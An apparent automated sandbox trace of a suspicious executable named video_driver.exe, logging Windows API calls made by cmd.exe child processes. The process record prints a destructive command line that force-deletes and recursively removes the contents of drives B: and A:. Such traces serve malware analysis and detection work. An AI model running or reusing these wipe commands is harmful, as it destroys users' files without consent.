[0066.616] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0066.616] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0066.617] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0066.617] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0066.617] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0066.617] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0066.617] GetProcessHeap () returned 0x4f0000 [0066.617] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x54) returned 0x5017c8 [0066.617] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3df710 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.617] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3df710, lpFilePart=0x3df70c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3df70c*="Desktop") returned 0x25 [0066.617] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.617] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3df48c | out: lpFindFileData=0x3df48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x505760 [0066.617] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0066.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3df48c | out: lpFindFileData=0x3df48c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x505760 [0066.618] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0066.618] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0066.618] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3df48c | out: lpFindFileData=0x3df48c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x505760 [0066.618] FindClose (in: hFindFile=0x505760 | out: hFindFile=0x505760) returned 1 [0066.618] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0066.618] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0066.618] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0066.618] GetProcessHeap () returned 0x4f0000 [0066.618] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504c70 | out: hHeap=0x4f0000) returned 1 [0066.618] GetEnvironmentStringsW () returned 0x504180* [0066.618] GetProcessHeap () returned 0x4f0000 [0066.618] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x505fa0 [0066.619] FreeEnvironmentStringsW (penv=0x504180) returned 1 [0066.619] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.619] GetProcessHeap () returned 0x4f0000 [0066.619] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5017c8 | out: hHeap=0x4f0000) returned 1 [0066.619] GetProcessHeap () returned 0x4f0000 [0066.619] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400e) returned 0x506ae0 [0066.619] GetProcessHeap () returned 0x4f0000 [0066.619] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xa0) returned 0x502e50 [0066.619] GetProcessHeap () returned 0x4f0000 [0066.619] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae0 | out: hHeap=0x4f0000) returned 1 [0066.619] GetConsoleOutputCP () returned 0x1b5 [0066.620] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.620] GetUserDefaultLCID () returned 0x409 [0066.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0066.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3df850, cchData=128 | out: lpLCData="0") returned 2 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3df850, cchData=128 | out: lpLCData="0") returned 2 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3df850, cchData=128 | out: lpLCData="1") returned 2 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a414cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a414c80, cchData=32 | out: lpLCData="Fri") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a414c40, cchData=32 | out: lpLCData="Sat") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a414c00, cchData=32 | out: lpLCData="Sun") returned 4 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a414930, cchData=8 | out: lpLCData=".") returned 2 [0066.621] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a414920, cchData=8 | out: lpLCData=",") returned 2 [0066.621] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0066.623] GetProcessHeap () returned 0x4f0000 [0066.623] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20c) returned 0x502ef8 [0066.623] GetConsoleTitleW (in: lpConsoleTitle=0x502ef8, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0066.623] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.623] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0066.623] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0066.624] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0066.624] GetProcessHeap () returned 0x4f0000 [0066.624] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x400a) returned 0x506ae0 [0066.624] GetProcessHeap () returned 0x4f0000 [0066.624] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50aaf8 [0066.625] GetProcessHeap () returned 0x4f0000 [0066.625] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1a) returned 0x5057e0 [0066.625] GetEnvironmentVariableW (in: lpName="p IN (\"A", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="CD") returned 13 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="ERRORLEVEL") returned 11 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="CMDEXTVERSION") returned 13 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="CMDCMDLINE") returned 13 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="DATE") returned 12 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="TIME") returned -4 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="RANDOM") returned -2 [0066.625] _wcsicmp (_String1="p IN (\"A", _String2="HIGHESTNUMANODENUMBER") returned 8 [0066.625] GetProcessHeap () returned 0x4f0000 [0066.625] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5057e0 | out: hHeap=0x4f0000) returned 1 [0066.625] GetProcessHeap () returned 0x4f0000 [0066.625] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50aaf8 | out: hHeap=0x4f0000) returned 1 [0066.626] GetProcessHeap () returned 0x4f0000 [0066.626] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x4008) returned 0x50aaf8 [0066.626] GetProcessHeap () returned 0x4f0000 [0066.626] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50aaf8 | out: hHeap=0x4f0000) returned 1 [0066.626] GetProcessHeap () returned 0x4f0000 [0066.626] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506ae0 | out: hHeap=0x4f0000) returned 1 [0066.626] _wcsicmp (_String1="if", _String2=")") returned 64 [0066.626] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0066.626] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0066.626] _wcsicmp (_String1="IF", _String2="if") returned 0 [0066.626] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0066.626] GetProcessHeap () returned 0x4f0000 [0066.626] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503110 [0066.626] GetProcessHeap () returned 0x4f0000 [0066.626] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4fffc0 [0066.627] GetProcessHeap () returned 0x4f0000 [0066.627] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x20) returned 0x5057e0 [0066.627] GetProcessHeap () returned 0x4f0000 [0066.628] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5057e0, Size=0x16) returned 0x501800 [0066.628] GetProcessHeap () returned 0x4f0000 [0066.628] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x501800) returned 0x16 [0066.628] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0066.628] GetProcessHeap () returned 0x4f0000 [0066.628] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503170 [0066.628] GetProcessHeap () returned 0x4f0000 [0066.628] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x5031d0 [0066.628] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0066.628] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0066.629] GetProcessHeap () returned 0x4f0000 [0066.629] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x5031f0 [0066.629] GetProcessHeap () returned 0x4f0000 [0066.629] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1c) returned 0x5057e0 [0066.629] GetProcessHeap () returned 0x4f0000 [0066.629] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5057e0, Size=0x14) returned 0x503210 [0066.629] GetProcessHeap () returned 0x4f0000 [0066.629] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x503210) returned 0x14 [0066.629] _wcsicmp (_String1="del", _String2=")") returned 59 [0066.629] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0066.629] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0066.630] _wcsicmp (_String1="IF", _String2="del") returned 5 [0066.630] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0066.630] _wcsicmp (_String1="REM", _String2="del") returned 14 [0066.630] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0066.630] GetProcessHeap () returned 0x4f0000 [0066.630] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503230 [0066.630] GetProcessHeap () returned 0x4f0000 [0066.630] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x10) returned 0x4fffd8 [0066.630] GetProcessHeap () returned 0x4f0000 [0066.630] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x28) returned 0x503290 [0066.631] GetProcessHeap () returned 0x4f0000 [0066.631] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x5032c0 [0066.631] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0066.632] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0066.632] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0066.632] GetProcessHeap () returned 0x4f0000 [0066.632] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503320 [0066.632] GetProcessHeap () returned 0x4f0000 [0066.632] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x44) returned 0x503380 [0066.632] GetProcessHeap () returned 0x4f0000 [0066.632] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x5033d0 [0066.632] GetProcessHeap () returned 0x4f0000 [0066.632] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x5033d0, Size=0x12) returned 0x5033d0 [0066.632] GetProcessHeap () returned 0x4f0000 [0066.632] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x5033d0) returned 0x12 [0066.632] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0066.633] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0066.633] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0066.633] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0066.633] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0066.633] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0066.633] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0066.634] GetProcessHeap () returned 0x4f0000 [0066.634] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x5033f0 [0066.634] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0066.635] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0066.635] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0066.635] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0066.635] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0066.635] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0066.635] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0066.635] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0066.635] GetProcessHeap () returned 0x4f0000 [0066.635] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x58) returned 0x503410 [0066.635] GetProcessHeap () returned 0x4f0000 [0066.635] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x503470 [0066.636] GetProcessHeap () returned 0x4f0000 [0066.636] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x20) returned 0x5057e0 [0066.638] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0066.640] GetFullPathNameW (in: lpFileName="A:", nBufferLength=0x208, lpBuffer=0x3df540, lpFilePart=0x3df2ec | out: lpBuffer="A:\\", lpFilePart=0x3df2ec*=0x0) returned 0x3 [0066.640] wcsncmp (_String1="A:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -27 [0066.646] GetFileAttributesW (lpFileName="A:\\" (normalized: "a:")) returned 0xffffffff [0066.646] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.646] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.648] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.648] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.648] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.648] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.648] SetConsoleInputExeNameW () returned 0x1 [0066.648] GetConsoleOutputCP () returned 0x1b5 [0066.649] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.649] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.649] exit (_Code=0) Process: id = "48" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4174f000" os_pid = "0x6c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 76 os_tid = 0xb88 [0066.741] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa14 | out: lpSystemTimeAsFileTime=0x26fa14*(dwLowDateTime=0x5967a20, dwHighDateTime=0x1d62400)) [0066.741] GetCurrentProcessId () returned 0x6c8 [0066.741] GetCurrentThreadId () returned 0xb88 [0066.741] GetTickCount () returned 0x11481cd [0066.741] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa0c | out: lpPerformanceCount=0x26fa0c*=18687448043) returned 1 [0066.744] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0066.744] __set_app_type (_Type=0x1) [0066.744] __p__fmode () returned 0x770331f4 [0066.744] __p__commode () returned 0x770331fc [0066.744] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0066.744] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0066.745] GetCurrentThreadId () returned 0xb88 [0066.745] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb88) returned 0x60 [0066.745] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0066.745] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0066.745] SetThreadUILanguage (LangId=0x0) returned 0x409 [0066.748] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0066.748] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f9a4 | out: phkResult=0x26f9a4*=0x0) returned 0x2 [0066.748] VirtualQuery (in: lpAddress=0x26f9db, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.748] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0066.748] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0066.748] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0066.748] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f974, dwLength=0x1c | out: lpBuffer=0x26f974*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x150000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0066.749] GetConsoleOutputCP () returned 0x1b5 [0066.749] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0066.749] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0066.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.749] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0066.749] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.749] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0066.750] _get_osfhandle (_FileHandle=1) returned 0x7 [0066.750] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0066.750] _get_osfhandle (_FileHandle=0) returned 0x3 [0066.750] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0066.750] GetEnvironmentStringsW () returned 0x5a20f8* [0066.750] GetProcessHeap () returned 0x590000 [0066.750] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a2bd0 [0066.751] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0066.751] GetProcessHeap () returned 0x590000 [0066.751] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0x4) returned 0x5a1898 [0066.751] GetEnvironmentStringsW () returned 0x5a20f8* [0066.751] GetProcessHeap () returned 0x590000 [0066.751] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x8, Size=0xaca) returned 0x5a36a8 [0066.751] FreeEnvironmentStringsW (penv=0x5a20f8) returned 1 [0066.751] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x68) returned 0x0 [0066.751] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.751] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.752] RegCloseKey (hKey=0x68) returned 0x0 [0066.752] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e914 | out: phkResult=0x26e914*=0x68) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x40, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x1, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x0, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x4, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x4) returned 0x0 [0066.752] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e91c, lpData=0x26e920, lpcbData=0x26e918*=0x1000 | out: lpType=0x26e91c*=0x0, lpData=0x26e920*=0x9, lpcbData=0x26e918*=0x1000) returned 0x2 [0066.753] RegCloseKey (hKey=0x68) returned 0x0 [0066.753] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6c [0066.753] srand (_Seed=0x5eb34b6c) [0066.753] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0066.753] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"B:\" del /f /s /q \"B:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" [0066.753] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0066.753] 